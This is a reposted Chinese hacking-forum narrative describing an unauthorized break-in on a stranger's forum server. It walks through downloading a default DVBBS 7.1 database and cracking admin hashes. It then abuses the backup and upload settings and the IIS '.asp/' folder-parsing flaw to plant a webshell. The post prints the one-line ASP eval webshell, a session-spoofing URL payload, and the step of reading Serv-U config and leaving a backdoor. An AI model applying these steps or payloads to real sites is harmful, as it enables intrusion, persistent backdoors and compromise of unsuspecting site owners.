DVBBS7.1后台备份得到一个webshell

转自：http://www.wrsky.com/read.php?tid=565
作者：firefox+lvhuana


今天上午上网的时候，非常无聊，好友都不在线。

正在无聊的时候，突然qq响了，一个陌生人要加我，顺便先看下他的资料，哦哦，原来这个人还有个人站点呢，通过他加我请求。然后开始看他的个人站点，原来是一个外挂站，晕糊中，外挂站点的人加我作什么。。。。

想想进他的站点看看吧，打开明小子的旁注工具2.2版本（这个启动速度快，我喜欢），扫了一下，看到他站点所在的服务器上面还有几个站点，再仔细扫了一下，发现一个dvbbs7.1的论坛的数据库是默认的dvbbs7.mdb，下载之，然后杀毒软件查下没有木马存在（现在有些无聊的人喜欢放一个默认数据库名字的木马来钓鱼。。小心为好），打开数据库找到管理员的后台账号密码和前台账号密码散列，破解一下吧，运气不错，几分钟md5的散列破解完毕了，全数字的前台密码。

登陆进去，再登陆进后台。好久不搞国内站了，手生中。。。。老思路，上传一个自己制作的asp语句插入gif图片中的asp木马（当然是更改为.gif了）。上传成功，然后到后台去还原数据库去，晕乎乎的，怎么提示无法识别的数据库格式，失败了。。看来动网现在成熟的多了，估计是对文件的头部做了识别了？？接着想办法吧。。

看到现在7.1版本的都有了blog功能了，在后台看看blog设置吧，突然看到有上传设置哦，而且还可以设置上传类型，增加一个mdb的文件格式吧，不错不错，增加成功。然后自己在本地建立一个空的mdb数据库，里面的内容为<%eval(request(\"lv\"))%>，然后把这个数据库上传，成功上传，再晕，怎么不是直接显示出相对路径的？而是fileid=1。。再到后台的blog管理那里找，找到上传的文件夹是Boke/UploadFile/，然后在上传管理那里找到了我上传的mdb文件，这下看看动网还能禁止我还原数据库么！？

成功还原数据库为.asp了，嘿嘿，一个webshell到手了，然后进入服务器，发现是win2k3的哦，看来执行cmd是没戏了，到处转转后找到d盘竟然能遍历，还有ser-u安装在d盘啊，浏览ServUDaemon.ini找到了目标站的物理路径，跳转到目标站的目录，然后留后门，好了，玩完了，撤退。

鉴于是win2k3系统的，大家都应该知道win2k3的一个文件夹名如果是.asp的话，这个文件夹里面的任何文件都做为asp来处理的，让我们再深入测试一下。在后台备份那里把备份路径改一下，改为.asp/，如果害怕失败的话，就用url编码一下那个.，就是%2easp/，然后备份数据库，这样就会得到一个.asp的目录，然后在上传设置那里把文件上传目录设置为.asp/，这样的话，所有的文件都上传到这个文件夹里了。回到前台，上传我的那个把一句话木马插入gif文件的那个2006s.gif，上传成功后，http://www.****.com/.asp/2006-2/200622714435439658.gif这个就是我们的shell了。用客户端连接，得到一个2006的webshell，不过输入密码后进入的时候会返回一个404错误，原因是ie把.asp后面的省略了，再次把http://www.*****.com/.asp/2006-2/200622714435439658.gif放在?%23=Execute(Session(%22%23%22))&pageName=PageList前面，seesion欺骗了一下，这个webshell就能正常使用了。


垃圾文章，可能还有其他更简单的方法，希望大家谁知道告诉一下。